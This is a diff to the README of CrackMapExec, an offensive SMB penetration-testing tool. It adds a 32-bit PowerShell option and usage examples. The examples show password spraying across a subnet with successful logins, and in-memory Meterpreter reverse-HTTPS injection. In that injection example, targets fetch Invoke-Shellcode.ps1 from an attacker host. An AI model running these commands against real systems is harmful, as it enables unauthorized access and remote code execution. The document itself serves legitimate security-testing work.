@@ -101,6 +101,7 @@ Command Execution:
101101
102102 --execm {atexec,wmi,smbexec}
103103 Method to execute the command (default: smbexec)
104+ --force-ps32 Force all PowerShell code/commands to run in a 32bit process
104105 -x COMMAND Execute the specified command
105106 -X PS_COMMAND Excute the specified powershell command
106107
@@ -109,7 +110,7 @@ Shellcode/EXE/DLL/Meterpreter Injection:
109110
110111 --inject {met_reverse_http,met_reverse_https,exe,shellcode,dll}
111112 Inject Shellcode, EXE, DLL or Meterpreter
112- --path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems
113+ --path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems (ignored if injecting Meterpreter)
113114 --procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)
114115 --exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)
115116 --met-options LHOST LPORT
@@ -148,6 +149,19 @@ Quick credential validation:
148149[+] 172.16.206.130:445 Login successful 'DESKTOP-QDVNP6B\username:password'
149150```
150151
152+ Specify multiple user/pass combinations from the command line or a file:
153+ ```
154+ #~ python crackmapexec.py -t 100 172.16.206.0/24 -u username1,username2 -p password1,password2
155+ [*] 192.168.2.5:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
156+ [*] 192.168.2.6:445 is running Windows 6.3 Build 9600 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
157+ [-] 192.168.2.5:445 'DRUGCOMPANY-PC\username1:password1' SMB SessionError: STATUS_LOGON_FAILURE ...
158+ [-] 192.168.2.5:445 'DRUGCOMPANY-PC\username2:password1' SMB SessionError: STATUS_LOGON_FAILURE ...
159+ [+] 192.168.2.5:445 Login successful 'HRBOX\username1:password2'
160+ [-] 192.168.2.6:445 'DESKTOP-QDVNP6B\username2:password1' SMB SessionError: STATUS_LOGON_FAILURE ...
161+ [-] 192.168.2.6:445 'DESKTOP-QDVNP6B\username1:password1' SMB SessionError: STATUS_LOGON_FAILURE ...
162+ [+] 192.168.2.6:445 Login successful 'DESKTOP-QDVNP6B\username1:password2'
163+ ```
164+
151165Let's enumerate available shares:
152166```
153167#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --shares
@@ -268,6 +282,21 @@ Lets Spider the C$ share starting from the ```Users``` folder for the pattern ``
268282[+] 172.16.206.130:445 DESKTOP-QDVNP6B Done spidering (Completed in 38.6000130177)
269283```
270284
285+ Directly inject Meterpreter into memory forcing the Powershell code to run in a 32bit process
286+ ```
287+ #~ python crackmapexec.py -t 100 192.168.2.5-6 -u username -p password --force-ps32 --inject met_reverse_https --met-options 192.168.2.1 4545
288+
289+ [*] Press CTRL-C at any time to exit
290+ [*] Note: This might take some time on large networks! Go grab a redbull!
291+
292+ [*] 192.168.2.5:445 is running Windows 6.1 Build 7601 (name:HRBOX) (domain:HRBOX)
293+ [*] 192.168.2.6:445 is running Windows 6.3 Build 9600 (name:AVERAGEJOEBOX) (domain:AVERAGEJOEBOX)
294+ [+] 192.168.2.5:445 Login successful 'HRBOX\username:password'
295+ [+] 192.168.2.6:445 Login successful 'AVERAGEJOEBOX\username:password'
296+ 192.168.2.6 - - [08/Oct/2015 12:50:56] "GET /Invoke-Shellcode.ps1 HTTP/1.1" 200 -
297+ 192.168.2.5 - - [08/Oct/2015 12:50:58] "GET /Invoke-Shellcode.ps1 HTTP/1.1" 200 -
298+ ```
299+
271300#To do
272301- Kerberos support
273302- ~~ Execute custom commands with mimikatz~~
0 commit comments